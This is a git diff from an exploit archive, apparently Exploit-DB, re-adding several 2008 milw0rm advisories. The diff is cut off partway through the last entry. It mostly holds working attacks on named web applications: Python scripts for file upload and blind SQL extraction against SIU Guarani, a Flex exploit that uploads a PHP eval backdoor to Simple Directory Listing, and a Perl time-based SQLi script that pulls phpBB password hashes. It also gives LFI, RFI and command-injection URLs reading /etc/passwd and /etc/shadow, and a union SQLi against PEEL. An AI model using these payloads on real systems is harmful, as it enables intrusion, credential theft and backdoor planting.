-date		: the 341st day of the year 2008
-
-contact		: N/A
-
-description	: SIU-Guarani is a web application which keeps information about academic activities. It's widely used in Argentina by national 
-universities. for more information, contact the vendor's web page.
-
-disclaimer
----------
-all the information and code given in this document is provided "as is", for educational purposes only. the authors will not be responsible for any 
-damage.
-
-technical information
----------------------
-disclosure of database information
-^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
-you can get some of the database information, such as user and password, used by Guarani. this bug is almost fixed by the vendor.
-http://guarani_server/includes/elegirConexion.php
-
-file upload
-^^^^^^^^^^^
-given a valid phpsessid, you can upload files to the server. this bug is fixed in some versions.
-http://guarani_server/a_docentes/subirArchivo.php
-
-sql injection
-^^^^^^^^^^^^^
-http://guarani_server/w_inicial.php
-OR 
-http://guarani_server/inicial.php
-
-Username (Identificacion): ' || (SQL Statement) || '
-Password (Clave): **** (anything)
-
-example:
-Username (Identificacion): ' || DBINFO('dbhostname') || '	
-Password (Clave): **** (anything)
-
-just remember they are using Informix!
-sql injection is partialy solved in some places.
-
-in order to fool some protections, such as "[Informix]An illegal character has been found in the statement.", you can use %27 instead of '.
-
-blind sql injection
-^^^^^^^^^^^^^^^^^^^
-hidden parameter "operacion" in:
-
-http://guarani_server/a_general/verMensajes.php
-http://guarani_server/a_general/autentificarse.php
-
-... and probably more!
-
-example (via POST): http://guarani_server/a_general/verMensajes.php?operacion=op0001' || (case when 10<1 then '1' else '2' end) || '
-
-another example (in autentificarse.php):
-
-operacion=op0001' || (SELECT '1' FROM systables where tabid = 1) || '  
-(no error, because it returns a single value)
-operacion=op0001' || (SELECT '1' FROM systables where tabid <> 1) || ' 
-(error, because there are multiple results)
-
-patchs / work arounds
----------------------
-among other things, the function which loads the foreign parameters should check for special characters.
-the software itself seems to be pretty buggy, releasing the software code under a license like BSD or GPL would help to improve its security.
-
-proof of concept
-----------------
-file upload
-^^^^^^^^^^^
-#!/bin/python
-# target : SIU Guarani
-# file : 4790
-# quote : "el poporembo como una flor", quintin
-# disclaimer : all the information and code given in this document is provided "as is", for educational purposes only. the authors will not be 
-# responsible for any damage.
-
-import pycurl
-import StringIO
-import sys
-
-if len(sys.argv) < 3:
-  print "SIU guarani file upload"
-  print "usage : " + sys.argv[0] + " <server> <local file>"
-  print "example : " + sys.argv[0] + " someuni.edu.ar/somedir someporn.jpg"
-  sys.exit(1)
-
-print "getting phpsessid.."
-c = pycurl.Curl()
-c.setopt(c.URL, "http://" + sys.argv[1] + "/inicial.php")
-c.setopt(c.COOKIEJAR, "/tmp/guaranicookie")
-c.setopt(c.WRITEFUNCTION, (lambda x : None))
-c.perform()
-c.close()
-
-print "uploading file.."
-r = StringIO.StringIO()
-c = pycurl.Curl()
-c.setopt(c.POST, 1)
-c.setopt(c.URL, "http://" + sys.argv[1] + "/a_docentes/subirArchivo.php")
-c.setopt(c.HTTPPOST, [("archivo", (c.FORM_FILE, sys.argv[2]))])
-c.setopt(c.COOKIEFILE, "/tmp/guaranicookie")
-c.setopt(c.WRITEFUNCTION, r.write)
-c.perform()
-r.seek(0)
-s = r.read()
-r.close()
-c.close()
-s = (s.split("'../library/bajarArchivo.php?qs="))[1]
-s = (s.split("'"))[0]
-print "your download link is http://" + sys.argv[1] + "/library/bajarArchivo.php?qs=" + s
-print "in order to download the file, first you'll need to join http://" + sys.argv[1] + "/ with your web browser"
-# EOF
-
-bind sql injection
-^^^^^^^^^^^^^^^^^^
-#!/bin/python
-# target : SIU Guarani
-# file : 4791
-# quote : "el poporembo como una flor", quintin
-# disclaimer : all the information and code given in this document is provided "as is", for educational purposes only. the authors will not be 
-# responsible for any damage.
-
-import pycurl
-import StringIO
-import sys
-
-def dic_sql(s, i, x, y):
-  num = "SUBSTRING(" + s  + " FROM " + str(i) + " FOR 1)"
-  return "(" + num + " >= '" + chr(x) + "') AND (" + num + " <= '" + chr(y) + "')"
-
-maxsize = 32
-
-if len(sys.argv) < 3:
-  print "SIU guarani blind sql execution"
-  print "usage : " + sys.argv[0] + " <server> <sql string to match> [maxsize=32]"
-  print "example : " + sys.argv[0] + " http://someuni.edu.ar/somedir USER"
-  print "remember, it's an informix database"
-  print "https support!"
-  sys.exit(1)
-
-if len(sys.argv) > 3:
-  maxsize = int(sys.argv[3])
-
-print "getting phpsessid.."
-c = pycurl.Curl()
-
-if (sys.argv[1][0:5] == "https"):
-  c.setopt(c.SSL_VERIFYPEER, 0)
-c.setopt(c.URL, sys.argv[1] + "/inicial.php")
-c.setopt(c.COOKIEJAR, "/tmp/guaranicookie")
-c.setopt(c.WRITEFUNCTION, (lambda x : None))
-c.perform()
-c.close()
-
-print "cracking sql result.."
-
-for l in range(1, maxsize + 1):
-  i = 48
-  f = 125
-  c = pycurl.Curl()
-  r = StringIO.StringIO()
-  if (sys.argv[1][0:5] == "https"):
-    c.setopt(c.SSL_VERIFYPEER, 0)
-  c.setopt(c.POST, 1)
-  c.setopt(c.URL, sys.argv[1] + "/a_general/verMensajes.php")
-  c.setopt(c.COOKIEFILE, "/tmp/guaranicookie")
-  c.setopt(c.WRITEFUNCTION, r.write)
-
-  while i <> f:
-    sql = dic_sql(sys.argv[2], l, i, i+(f-i)/2)
-    c.setopt(c.HTTPPOST, [("operacion", "gda0011' || case when (" + sql + ") then '1' else '2' end || '"), ("ver", "T")])
-    c.perform()
-    r.seek(0)
-    s = r.read()
-    r.truncate(0)
-    if len(s) == 0:
-      print "uhm... looks like a wrong sql string!"
-      sys.exit(1)
-    if len(s.split("No hay mensajes.")) > 1 or len(s.split("Anuncio")) > 1:
-      f = i + (f - i) / 2
-    else:
-      i = i + (f - i) / 2 + 1
-  r.close()
-  c.close()
-  if i == 125:
-    break
-  sys.stdout.write(chr(i))
-  sys.stdout.flush()
-sys.stdout.write('\n')
-# EOF
-
-# milw0rm.com [2008-12-08]
+        #
+    #   #   #
+    ### # ##
+      #####             multiple remote vulnerabilities
+  ############              siu guarani
+     ######
+    ##  #  ##
+        #
+
+
+general information
+-------------------
+bug type	: multiple remote vulnerabilities
+
+software name	: SIU Guarani
+
+vendor		: SIU (www.siu.edu.ar)
+
+authors		: proudhon & Ubik
+
+date		: the 341st day of the year 2008
+
+contact		: N/A
+
+description	: SIU-Guarani is a web application which keeps information about academic activities. It's widely used in Argentina by national 
+universities. for more information, contact the vendor's web page.
+
+disclaimer
+---------
+all the information and code given in this document is provided "as is", for educational purposes only. the authors will not be responsible for any 
+damage.
+
+technical information
+---------------------
+disclosure of database information
+^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
+you can get some of the database information, such as user and password, used by Guarani. this bug is almost fixed by the vendor.
+http://guarani_server/includes/elegirConexion.php
+
+file upload
+^^^^^^^^^^^
+given a valid phpsessid, you can upload files to the server. this bug is fixed in some versions.
+http://guarani_server/a_docentes/subirArchivo.php
+
+sql injection
+^^^^^^^^^^^^^
+http://guarani_server/w_inicial.php
+OR 
+http://guarani_server/inicial.php
+
+Username (Identificacion): ' || (SQL Statement) || '
+Password (Clave): **** (anything)
+
+example:
+Username (Identificacion): ' || DBINFO('dbhostname') || '	
+Password (Clave): **** (anything)
+
+just remember they are using Informix!
+sql injection is partialy solved in some places.
+
+in order to fool some protections, such as "[Informix]An illegal character has been found in the statement.", you can use %27 instead of '.
+
+blind sql injection
+^^^^^^^^^^^^^^^^^^^
+hidden parameter "operacion" in:
+
+http://guarani_server/a_general/verMensajes.php
+http://guarani_server/a_general/autentificarse.php
+
+... and probably more!
+
+example (via POST): http://guarani_server/a_general/verMensajes.php?operacion=op0001' || (case when 10<1 then '1' else '2' end) || '
+
+another example (in autentificarse.php):
+
+operacion=op0001' || (SELECT '1' FROM systables where tabid = 1) || '  
+(no error, because it returns a single value)
+operacion=op0001' || (SELECT '1' FROM systables where tabid <> 1) || ' 
+(error, because there are multiple results)
+
+patchs / work arounds
+---------------------
+among other things, the function which loads the foreign parameters should check for special characters.
+the software itself seems to be pretty buggy, releasing the software code under a license like BSD or GPL would help to improve its security.
+
+proof of concept
+----------------
+file upload
+^^^^^^^^^^^
+#!/bin/python
+# target : SIU Guarani
+# file : 4790
+# quote : "el poporembo como una flor", quintin
+# disclaimer : all the information and code given in this document is provided "as is", for educational purposes only. the authors will not be 
+# responsible for any damage.
+
+import pycurl
+import StringIO
+import sys
+
+if len(sys.argv) < 3:
+  print "SIU guarani file upload"
+  print "usage : " + sys.argv[0] + " <server> <local file>"
+  print "example : " + sys.argv[0] + " someuni.edu.ar/somedir someporn.jpg"
+  sys.exit(1)
+
+print "getting phpsessid.."
+c = pycurl.Curl()
+c.setopt(c.URL, "http://" + sys.argv[1] + "/inicial.php")
+c.setopt(c.COOKIEJAR, "/tmp/guaranicookie")
+c.setopt(c.WRITEFUNCTION, (lambda x : None))
+c.perform()
+c.close()
+
+print "uploading file.."
+r = StringIO.StringIO()
+c = pycurl.Curl()
+c.setopt(c.POST, 1)
+c.setopt(c.URL, "http://" + sys.argv[1] + "/a_docentes/subirArchivo.php")
+c.setopt(c.HTTPPOST, [("archivo", (c.FORM_FILE, sys.argv[2]))])
+c.setopt(c.COOKIEFILE, "/tmp/guaranicookie")
+c.setopt(c.WRITEFUNCTION, r.write)
+c.perform()
+r.seek(0)
+s = r.read()
+r.close()
+c.close()
+s = (s.split("'../library/bajarArchivo.php?qs="))[1]
+s = (s.split("'"))[0]
+print "your download link is http://" + sys.argv[1] + "/library/bajarArchivo.php?qs=" + s
+print "in order to download the file, first you'll need to join http://" + sys.argv[1] + "/ with your web browser"
+# EOF
+
+bind sql injection
+^^^^^^^^^^^^^^^^^^
+#!/bin/python
+# target : SIU Guarani
+# file : 4791
+# quote : "el poporembo como una flor", quintin
+# disclaimer : all the information and code given in this document is provided "as is", for educational purposes only. the authors will not be 
+# responsible for any damage.
+
+import pycurl
+import StringIO
+import sys
+
+def dic_sql(s, i, x, y):
+  num = "SUBSTRING(" + s  + " FROM " + str(i) + " FOR 1)"
+  return "(" + num + " >= '" + chr(x) + "') AND (" + num + " <= '" + chr(y) + "')"
+
+maxsize = 32
+
+if len(sys.argv) < 3:
+  print "SIU guarani blind sql execution"
+  print "usage : " + sys.argv[0] + " <server> <sql string to match> [maxsize=32]"
+  print "example : " + sys.argv[0] + " http://someuni.edu.ar/somedir USER"
+  print "remember, it's an informix database"
+  print "https support!"
+  sys.exit(1)
+
+if len(sys.argv) > 3:
+  maxsize = int(sys.argv[3])
+
+print "getting phpsessid.."
+c = pycurl.Curl()
+
+if (sys.argv[1][0:5] == "https"):
+  c.setopt(c.SSL_VERIFYPEER, 0)
+c.setopt(c.URL, sys.argv[1] + "/inicial.php")
+c.setopt(c.COOKIEJAR, "/tmp/guaranicookie")
+c.setopt(c.WRITEFUNCTION, (lambda x : None))
+c.perform()
+c.close()
+
+print "cracking sql result.."
+
+for l in range(1, maxsize + 1):
+  i = 48
+  f = 125
+  c = pycurl.Curl()
+  r = StringIO.StringIO()
+  if (sys.argv[1][0:5] == "https"):
+    c.setopt(c.SSL_VERIFYPEER, 0)
+  c.setopt(c.POST, 1)
+  c.setopt(c.URL, sys.argv[1] + "/a_general/verMensajes.php")
+  c.setopt(c.COOKIEFILE, "/tmp/guaranicookie")
+  c.setopt(c.WRITEFUNCTION, r.write)
+
+  while i <> f:
+    sql = dic_sql(sys.argv[2], l, i, i+(f-i)/2)
+    c.setopt(c.HTTPPOST, [("operacion", "gda0011' || case when (" + sql + ") then '1' else '2' end || '"), ("ver", "T")])
+    c.perform()
+    r.seek(0)
+    s = r.read()
+    r.truncate(0)
+    if len(s) == 0:
+      print "uhm... looks like a wrong sql string!"
+      sys.exit(1)
+    if len(s.split("No hay mensajes.")) > 1 or len(s.split("Anuncio")) > 1:
+      f = i + (f - i) / 2
+    else:
+      i = i + (f - i) / 2 + 1
+  r.close()
+  c.close()
+  if i == 125:
+    break
+  sys.stdout.write(chr(i))
+  sys.stdout.flush()
+sys.stdout.write('\n')
+# EOF
+
+# milw0rm.com [2008-12-08]
diff --git a/platforms/php/webapps/7383.txt b/platforms/php/webapps/7383.txt
index 3f9b5e9f0..032de1c87 100755
--- a/platforms/php/webapps/7383.txt
+++ b/platforms/php/webapps/7383.txt
@@ -1,38 +1,38 @@
-Simple Directory Listing 2 - Cross Site File Upload
---------------------------------------------------------------------------------
-<mx:Application xmlns:mx="http://www.adobe.com/2006/mxml" creationComplete="onAppInit()">
-	<mx:Script>
-		/*  
-			Written by Michael Brooks
-			
-			VUlerablity type: Cross Site File Upload.
-			Affects: SDL 2.1 beta1
-			Product homepage: http://simpledirectorylisting.net/
-			
-			SDL has 22+ million downloads from sourceforge.net!
-			The top three php projects where hacked in one day using . 
-			 
-			Exploit built using Flex 3.2 (http://www.adobe.com/go/flex_trial)
-			uploads ./backdoor.php in the same directory as SDL2.php
-			Backdoor Useage:
-			http://10.1.1.155/backdoor.php?e=phpinfo();
-			backdoor code:
-			<?php eval($_GET[e])?>
-			
-			More info on Cross Site File Upload Attacks:
-			http://www.gnucitizen.org/blog/cross-site-file-upload-attacks/
-			Inspired by the work of Petko D. Petkov; pdp
-		 * GNUCITIZEN
-		 **/
-		import flash.net.*;
-		private function onAppInit():void{
-			var request:URLRequest = new URLRequest("http://10.1.1.155/SDL2.php?action=module&module=ModuleUpload&moduleParams[action]=upload&moduleParams[cwdRelPath]=");	
-			request.requestHeaders.push(new URLRequestHeader('Content-Type', 'multipart/form-data; boundary=---------------------------109092118919201'));       
-		 	request.data = unescape('-----------------------------109092118919201%0D%0AContent-Disposition%3A form-data%3B name%3D%22file%22%3B filename%3D%22backdoor.php%22%0D%0AContent-Type%3A text%2Fplain%0D%0A%0D%0A%3C%3Fphp eval%28stripslashes%28%24_GET%5Be%5D%29%29%3F%3E%0D%0A-----------------------------109092118919201%0D%0AContent-Disposition%3A form-data%3B name%3D%22upload%22%0D%0A%0D%0AUpload%0D%0A-----------------------------109092118919201--%0A');
-			request.method = URLRequestMethod.POST;
-		    navigateToURL(request, '_self');	
-		}
-	</mx:Script>
-</mx:Application>
-
-# milw0rm.com [2008-12-08]
+Simple Directory Listing 2 - Cross Site File Upload
+--------------------------------------------------------------------------------
+<mx:Application xmlns:mx="http://www.adobe.com/2006/mxml" creationComplete="onAppInit()">
+	<mx:Script>
+		/*  
+			Written by Michael Brooks
+			
+			VUlerablity type: Cross Site File Upload.
+			Affects: SDL 2.1 beta1
+			Product homepage: http://simpledirectorylisting.net/
+			
+			SDL has 22+ million downloads from sourceforge.net!
+			The top three php projects where hacked in one day using . 
+			 
+			Exploit built using Flex 3.2 (http://www.adobe.com/go/flex_trial)
+			uploads ./backdoor.php in the same directory as SDL2.php
+			Backdoor Useage:
+			http://10.1.1.155/backdoor.php?e=phpinfo();
+			backdoor code:
+			<?php eval($_GET[e])?>
+			
+			More info on Cross Site File Upload Attacks:
+			http://www.gnucitizen.org/blog/cross-site-file-upload-attacks/
+			Inspired by the work of Petko D. Petkov; pdp
+		 * GNUCITIZEN
+		 **/
+		import flash.net.*;
+		private function onAppInit():void{
+			var request:URLRequest = new URLRequest("http://10.1.1.155/SDL2.php?action=module&module=ModuleUpload&moduleParams[action]=upload&moduleParams[cwdRelPath]=");	
+			request.requestHeaders.push(new URLRequestHeader('Content-Type', 'multipart/form-data; boundary=---------------------------109092118919201'));       
+		 	request.data = unescape('-----------------------------109092118919201%0D%0AContent-Disposition%3A form-data%3B name%3D%22file%22%3B filename%3D%22backdoor.php%22%0D%0AContent-Type%3A text%2Fplain%0D%0A%0D%0A%3C%3Fphp eval%28stripslashes%28%24_GET%5Be%5D%29%29%3F%3E%0D%0A-----------------------------109092118919201%0D%0AContent-Disposition%3A form-data%3B name%3D%22upload%22%0D%0A%0D%0AUpload%0D%0A-----------------------------109092118919201--%0A');
+			request.method = URLRequestMethod.POST;
+		    navigateToURL(request, '_self');	
+		}
+	</mx:Script>
+</mx:Application>
+
+# milw0rm.com [2008-12-08]
diff --git a/platforms/php/webapps/7386.pl b/platforms/php/webapps/7386.pl
index ddd56fc5e..a8b630458 100755
--- a/platforms/php/webapps/7386.pl
+++ b/platforms/php/webapps/7386.pl
@@ -1,71 +1,71 @@
-#!/usr/bin/perl 
-# ---------------------------------------------------------------
-# phpBB 3 (Mod Tag Board <= 4) Remote Blind SQL Injection Exploit  
-# by athos - staker[at]hotmail[dot]it
-# http://bx67212.netsons.org/forum/viewforum.php?f=3
-# ---------------------------------------------------------------
-# Note: Works regardless PHP.ini settings!
-# Thanks meh also know as cHoBi
-# ---------------------------------------------------------------
-
-use strict;
-use LWP::UserAgent;
-
-my ($hash,$time1,$time2);
-
-my @chars = (48..57, 97..102); 
-my $http  = new LWP::UserAgent;
-
-my $host  = shift;
-my $table = shift;
-my $myid  = shift or &usage;
-
-
-sub injection
-{
-    my ($sub,$char) = @_;
-    
-    return "/tag_board.php?mode=controlpanel&action=delete&id=".
-           "1+and+(select+if((ascii(substring(user_password,${sub},1)".
-           ")=${char}),benchmark(230000000,char(0)),0)+from+${table}_us".
-           "ers+where+user_id=${myid})--";
-}
-
-
-sub usage
-{
-    print STDOUT "Usage: perl $0 [host] [table_prefix] [user_id]\n";
-    print STDOUT "Howto: perl $0 http://localhost/phpBB phpbb 2\n";
-    print STDOUT "by athos - staker[at]hotmail[dot]it\n";
-    exit;
-}
-
-
-syswrite(STDOUT,'Hash MD5: ');
-
-for my $i(1..33)
-{
-    for my $j(0..16)
-    {
-        $time1 = time();
-
-        $http->get($host.injection($i,$chars[$j]));
-        
-        $time2 = time();
-
-        if($time2 - $time1 > 6)
-        {
-            syswrite(STDOUT,chr($chars[$j]));
-            $hash .= chr($chars[$j]); 
-            last;
-        }
-        
-        if($i == 1 && length $hash < 0)
-        {
-            syswrite(STDOUT,"Exploit Failed!\n");
-            exit;
-        } 
-    }
-}
-
-# milw0rm.com [2008-12-08]
+#!/usr/bin/perl 
+# ---------------------------------------------------------------
+# phpBB 3 (Mod Tag Board <= 4) Remote Blind SQL Injection Exploit  
+# by athos - staker[at]hotmail[dot]it
+# http://bx67212.netsons.org/forum/viewforum.php?f=3
+# ---------------------------------------------------------------
+# Note: Works regardless PHP.ini settings!
+# Thanks meh also know as cHoBi
+# ---------------------------------------------------------------
+
+use strict;
+use LWP::UserAgent;
+
+my ($hash,$time1,$time2);
+
+my @chars = (48..57, 97..102); 
+my $http  = new LWP::UserAgent;
+
+my $host  = shift;
+my $table = shift;
+my $myid  = shift or &usage;
+
+
+sub injection
+{
+    my ($sub,$char) = @_;
+    
+    return "/tag_board.php?mode=controlpanel&action=delete&id=".
+           "1+and+(select+if((ascii(substring(user_password,${sub},1)".
+           ")=${char}),benchmark(230000000,char(0)),0)+from+${table}_us".
+           "ers+where+user_id=${myid})--";
+}
+
+
+sub usage
+{
+    print STDOUT "Usage: perl $0 [host] [table_prefix] [user_id]\n";
+    print STDOUT "Howto: perl $0 http://localhost/phpBB phpbb 2\n";
+    print STDOUT "by athos - staker[at]hotmail[dot]it\n";
+    exit;
+}
+
+
+syswrite(STDOUT,'Hash MD5: ');
+
+for my $i(1..33)
+{
+    for my $j(0..16)
+    {
+        $time1 = time();
+
+        $http->get($host.injection($i,$chars[$j]));
+        
+        $time2 = time();
+
+        if($time2 - $time1 > 6)
+        {
+            syswrite(STDOUT,chr($chars[$j]));
+            $hash .= chr($chars[$j]); 
+            last;
+        }
+        
+        if($i == 1 && length $hash < 0)
+        {
+            syswrite(STDOUT,"Exploit Failed!\n");
+            exit;
+        } 
+    }
+}
+
+# milw0rm.com [2008-12-08]
diff --git a/platforms/php/webapps/7388.txt b/platforms/php/webapps/7388.txt
index cd196c511..018f95e17 100755
--- a/platforms/php/webapps/7388.txt
+++ b/platforms/php/webapps/7388.txt
@@ -1,87 +1,86 @@
-
-  :::::::-.   ...    ::::::.    :::.
-   ;;,   `';, ;;     ;;;`;;;;,  `;;;
-   `[[     [[[['     [[[  [[[[[. '[[
-    $$,    $$$$      $$$  $$$ "Y$c$$
-    888_,o8P'88    .d888  888    Y88
-    MMMMP"`   "YmmMMMM""  MMM     YM
-
-   [ Discovered by dun \ dun[at]strcpy.pl ]
-
- #########################################################
- #  [ webcaf <= 1.4 ]  Multiple Remote Vulnerabilities   #
- #########################################################
- #
- # Script: "WebCAF is a web-based child and family database developed by Head Start of Lane County..."
- #
- # Script site: http://www.webcaf.org/
- # Download: http://www.webcaf.net/downloads/webcaf-1.4.tar.gz
- #
- # [Arbitrary File Delete Vulnerability]
- # Vuln: http://site.com/webcaf/index.php?user_uid=../../../../../../etc/shadow ;)
- #
- # Bug: ./webcaf/index.php (lines: 49-50 and 61-63) 
- #
- # ...
- #	// Login, if necessary
- #	if (!$user_uid) include("modules/login.php");
- # ... 	 
- #	if ($_REQUEST[op] != "update") {
- #		if (file_exists("local/tmp/.$user_uid")) unlink("local/tmp/.$user_uid");
- #	}
- # ... 	 
- #
- #
- # [LFI] 
- # Vuln: http://strcpy.pl/webcaf/webcaf/?user_uid=1&op=forms&form=../../../../../../../../../../../../etc/passwd
- #		 http://strcpy.pl/webcaf/webcaf/?user_uid=1&op=reports&report=../../../../../../../../../../../../etc/passwd
- #
- # Bug: ./webcaf/index.php (lines: 68-131) 
- #
- # ...
- # 	switch ($_REQUEST[op]) {
- # ...
- #	case "forms":
- #		$_REQUEST[form] ? include("local/forms/$_REQUEST[form]") : include("modules/forms.php");	//LFI
- #		break;
- # ...
- #  case "reports":
- #		$_REQUEST[report] ? include("local/reports/$_REQUEST[report]") : include("modules/reports.php");  	//LFI
- #		break;
- # ...
- #  }
- # ... 	 
- #
- # Vuln: http://strcpy.pl/webcaf/webcaf/modules/view.php?view=../../../../../../../../../../../etc/passwd%00
- #
- # Bug: ./webcaf/modules/view.php (lines: 12-21) 
- #
- # ...
- #	if ($_REQUEST[view]) {
- # ...
- #  		include("views/$_REQUEST[view].php");	//LFI
- #	}
- # ... 	 
- #
- #
- # [RCE]
- # Vuln: http://site.com/webcaf/about.php?_WEBCAF[db_database]=asfa%22;id%3E/tmp/aaa.txt;false%20%22
- #
- # Bug: ./webcaf/index.php (lines: 127) 
- #
- # ...
- # $str_result = system("$str_mysql --database=\"$_WEBCAF[db_database]\" --user=\"$_WEBCAF[db_username]\" --password=\"$_WEBCAF[db_password]\" --html --execute=\"status\"");
- # ... 	 
- #
- # and a lot of other bugz...
- #
- #
- ###############################################
- # Greetz: D3m0n_DE * str0ke * and otherz..
- ###############################################
-
- [ dun / 2008 ] 
-
-*******************************************************************************************
-
-# milw0rm.com [2008-12-08]
+  :::::::-.   ...    ::::::.    :::.
+   ;;,   `';, ;;     ;;;`;;;;,  `;;;
+   `[[     [[[['     [[[  [[[[[. '[[
+    $$,    $$$$      $$$  $$$ "Y$c$$
+    888_,o8P'88    .d888  888    Y88
+    MMMMP"`   "YmmMMMM""  MMM     YM
+
+   [ Discovered by dun \ dun[at]strcpy.pl ]
+
+ #########################################################
+ #  [ webcaf <= 1.4 ]  Multiple Remote Vulnerabilities   #
+ #########################################################
+ #
+ # Script: "WebCAF is a web-based child and family database developed by Head Start of Lane County..."
+ #
+ # Script site: http://www.webcaf.org/
+ # Download: http://www.webcaf.net/downloads/webcaf-1.4.tar.gz
+ #
+ # [Arbitrary File Delete Vulnerability]
+ # Vuln: http://site.com/webcaf/index.php?user_uid=../../../../../../etc/shadow ;)
+ #
+ # Bug: ./webcaf/index.php (lines: 49-50 and 61-63) 
+ #
+ # ...
+ #	// Login, if necessary
+ #	if (!$user_uid) include("modules/login.php");
+ # ... 	 
+ #	if ($_REQUEST[op] != "update") {
+ #		if (file_exists("local/tmp/.$user_uid")) unlink("local/tmp/.$user_uid");
+ #	}
+ # ... 	 
+ #
+ #
+ # [LFI] 
+ # Vuln: http://strcpy.pl/webcaf/webcaf/?user_uid=1&op=forms&form=../../../../../../../../../../../../etc/passwd
+ #		 http://strcpy.pl/webcaf/webcaf/?user_uid=1&op=reports&report=../../../../../../../../../../../../etc/passwd
+ #
+ # Bug: ./webcaf/index.php (lines: 68-131) 
+ #
+ # ...
+ # 	switch ($_REQUEST[op]) {
+ # ...
+ #	case "forms":
+ #		$_REQUEST[form] ? include("local/forms/$_REQUEST[form]") : include("modules/forms.php");	//LFI
+ #		break;
+ # ...
+ #  case "reports":
+ #		$_REQUEST[report] ? include("local/reports/$_REQUEST[report]") : include("modules/reports.php");  	//LFI
+ #		break;
+ # ...
+ #  }
+ # ... 	 
+ #
+ # Vuln: http://strcpy.pl/webcaf/webcaf/modules/view.php?view=../../../../../../../../../../../etc/passwd%00
+ #
+ # Bug: ./webcaf/modules/view.php (lines: 12-21) 
+ #
+ # ...
+ #	if ($_REQUEST[view]) {
+ # ...
+ #  		include("views/$_REQUEST[view].php");	//LFI
+ #	}
+ # ... 	 
+ #
+ #
+ # [RCE]
+ # Vuln: http://site.com/webcaf/about.php?_WEBCAF[db_database]=asfa%22;id%3E/tmp/aaa.txt;false%20%22
+ #
+ # Bug: ./webcaf/index.php (lines: 127) 
+ #
+ # ...
+ # $str_result = system("$str_mysql --database=\"$_WEBCAF[db_database]\" --user=\"$_WEBCAF[db_username]\" --password=\"$_WEBCAF[db_password]\" --html --execute=\"status\"");
+ # ... 	 
+ #
+ # and a lot of other bugz...
+ #
+ #
+ ###############################################
+ # Greetz: D3m0n_DE * str0ke * and otherz..
+ ###############################################
+
+ [ dun / 2008 ] 
+
+*******************************************************************************************
+
+# milw0rm.com [2008-12-08]
diff --git a/platforms/php/webapps/7392.txt b/platforms/php/webapps/7392.txt
index 316d1144c..5d2b60017 100755
--- a/platforms/php/webapps/7392.txt
+++ b/platforms/php/webapps/7392.txt
@@ -1,40 +1,40 @@
-[~] PHPmyGallery v~1.0beta2 RFi/LFi Multiple Remote Vuln.
-[~]
-[~] download: http://phpmygallery.kapierich.net/en/downloads/?dir=PHP/&getfile=PK_phpmygallery-1.0beta2.zip
-[~]
-[~] ----------------------------------------------------------
-[~] Discovered By: ZoRLu   msn: trt-turk@hotmail.com
-[~]
-[~] Home: www.z0rlu.blogspot.com
-[~]
-[~] Date: 08/12/2008
-[~]
-[~] N0T: TUM iSLAM ALEMiNiN BAYRAMINI KUTLARIM...!
-[~]
-[~] N0T: YALNIZLIK, YiTiRDi ANLAMINI YALNIZLIGIMDA : ( (
-[~] -----------------------------------------------------------
-
-file:
-
-_conf/core/common-tpl-vars.php
-
-c0de:
-
-require($confdir.'lang/langpack.'.$lang.'.php');  ( line 23 )
-
-rfi:
-
-http://www.z0rlu.blogspot.com/script/_conf/core/common-tpl-vars.php?confdir=ZoRLu.txt?
-
-lfi:
-
-http://www.z0rlu.blogspot.com/script/_conf/core/common-tpl-vars.php?lang=[LFi]
-
-[~]----------------------------------------------------------------------
-[~] Greetz tO: str0ke 
-[~]
-[~] yildirimordulari.org  &  darkc0de.com
-[~]
-[~]----------------------------------------------------------------------
-
-# milw0rm.com [2008-12-09]
+[~] PHPmyGallery v~1.0beta2 RFi/LFi Multiple Remote Vuln.
+[~]
+[~] download: http://phpmygallery.kapierich.net/en/downloads/?dir=PHP/&getfile=PK_phpmygallery-1.0beta2.zip
+[~]
+[~] ----------------------------------------------------------
+[~] Discovered By: ZoRLu   msn: trt-turk@hotmail.com
+[~]
+[~] Home: www.z0rlu.blogspot.com
+[~]
+[~] Date: 08/12/2008
+[~]
+[~] N0T: TUM iSLAM ALEMiNiN BAYRAMINI KUTLARIM...!
+[~]
+[~] N0T: YALNIZLIK, YiTiRDi ANLAMINI YALNIZLIGIMDA : ( (
+[~] -----------------------------------------------------------
+
+file:
+
+_conf/core/common-tpl-vars.php
+
+c0de:
+
+require($confdir.'lang/langpack.'.$lang.'.php');  ( line 23 )
+
+rfi:
+
+http://www.z0rlu.blogspot.com/script/_conf/core/common-tpl-vars.php?confdir=ZoRLu.txt?
+
+lfi:
+
+http://www.z0rlu.blogspot.com/script/_conf/core/common-tpl-vars.php?lang=[LFi]
+
+[~]----------------------------------------------------------------------
+[~] Greetz tO: str0ke 
+[~]
+[~] yildirimordulari.org  &  darkc0de.com
+[~]
+[~]----------------------------------------------------------------------
+
+# milw0rm.com [2008-12-09]
diff --git a/platforms/php/webapps/7395.txt b/platforms/php/webapps/7395.txt
index c52b24ca5..d9077ca0b 100755
--- a/platforms/php/webapps/7395.txt
+++ b/platforms/php/webapps/7395.txt
@@ -1,23 +1,23 @@
-            ############### SuB-ZeRo ###############
-             ############### Dz-hackers #################
-            PEEL Remote SQL Injection Vulnerability
------------------------------------------------------------------------------------------------------------
-
-[+]Discovred by : SuB-ZeRo
-[+]Vendor URL : http://www.peel.fr/
-[+]downloader : http://www.script-masters.com/home/voir_script_php_mysql-146.html
-[+]home: www.sub-z3ro.com / www.h4ck3r-dz.com
-[+]ConTacTe: FbH@hotmail.com
-[+]DoRk: FiNd It (SoOrY)
-[+]exploit:
-[+]http://[website]/[script]/lire/index.php?rubid=1+union+select+1,@@version,3--
-[+]http://[website]/[script]/index.php?rubid=1+union+select+1,@@version,3--
-[+]l!ve demo:
-[+]http://demo.peel.fr/lire/index.php?rubid=1+union+select+1,@@version,3--
- 
-----------------------------------------------------------------------------------------------------------------------
-[+]grettz : for my best frinde x.CJP.x / sousn / bbbbbbbb / and all mouslims and eid sa3id for all arabs and mouslimme
-----------------------------------------------------------------------------------------------------------------------
-SooN sub-z3ro.com
-
-# milw0rm.com [2008-12-09]
+            ############### SuB-ZeRo ###############
+             ############### Dz-hackers #################
+            PEEL Remote SQL Injection Vulnerability
+-----------------------------------------------------------------------------------------------------------
+
+[+]Discovred by : SuB-ZeRo
+[+]Vendor URL : http://www.peel.fr/
+[+]downloader : http://www.script-masters.com/home/voir_script_php_mysql-146.html
+[+]home: www.sub-z3ro.com / www.h4ck3r-dz.com
+[+]ConTacTe: FbH@hotmail.com
+[+]DoRk: FiNd It (SoOrY)
